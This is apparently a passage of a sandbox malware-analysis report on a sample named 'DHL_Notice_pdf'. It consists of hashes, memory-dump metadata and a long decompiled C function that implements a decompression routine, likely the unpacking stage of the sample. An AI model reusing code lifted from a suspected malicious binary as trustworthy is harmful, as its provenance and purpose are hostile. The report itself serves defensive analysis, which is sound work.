                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x00000000
                                                            0x00407390
                                                            0x0040738e
                                                            0x004075c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                            0x00406bc0
                                                            0x00406bc7
                                                            0x00406bcd
                                                            0x00406bd3
                                                            0x00000000
                                                            0x00406bd7
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406bec
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x00000000
                                                            0x00406bf9
                                                            0x00406bfd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c06
                                                            0x00406c09
                                                            0x00406c0c
                                                            0x00406c0e
                                                            0x00406c10
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c16
                                                            0x00406c19
                                                            0x00406c1b
                                                            0x00406c1c
                                                            0x00406c1f
                                                            0x00406c21
                                                            0x00406c22
                                                            0x00406c24
                                                            0x00406c27
                                                            0x00406c2c
                                                            0x00406c31
                                                            0x00406c3a
                                                            0x00406c4d
                                                            0x00406c50
                                                            0x00406c59
                                                            0x00406c5c
                                                            0x00406c84
                                                            0x00406c84
                                                            0x00406c86
                                                            0x00406c94
                                                            0x00406c94
                                                            0x00406c98
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c88
                                                            0x00406c8b
                                                            0x00406c8b
                                                            0x00406c8c
                                                            0x00406c8c
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c5e
                                                            0x00406c62
                                                            0x00406c67
                                                            0x00406c67
                                                            0x00406c70
                                                            0x00406c76
                                                            0x00406c78
                                                            0x00406c7b
                                                            0x00000000
                                                            0x00406c81
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c9e
                                                            0x00406c9e
                                                            0x00406ca2
                                                            0x0040754e
                                                            0x00000000
                                                            0x0040754e
                                                            0x00406cab
                                                            0x00406cbb
                                                            0x00406cbe
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc4
                                                            0x00406cc4
                                                            0x00406cc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cca
                                                            0x00406ccd
                                                            0x00406cd0
                                                            0x00406cfa
                                                            0x00406d00
                                                            0x00406d07
                                                            0x00000000
                                                            0x00406d07
                                                            0x00406cd2
                                                            0x00406cd6
                                                            0x00406cd9
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406ce9
                                                            0x00406cef
                                                            0x00406cf1
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d39
                                                            0x00406d3f
                                                            0x00406d42
                                                            0x00406d4f
                                                            0x00406d57
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d0e
                                                            0x00406d0e
                                                            0x00406d12
                                                            0x0040755d
                                                            0x00000000
                                                            0x0040755d
                                                            0x00406d1e
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d2c
                                                            0x00406d2f
                                                            0x00406d32
                                                            0x00406d35
                                                            0x00406d37
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073dd
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
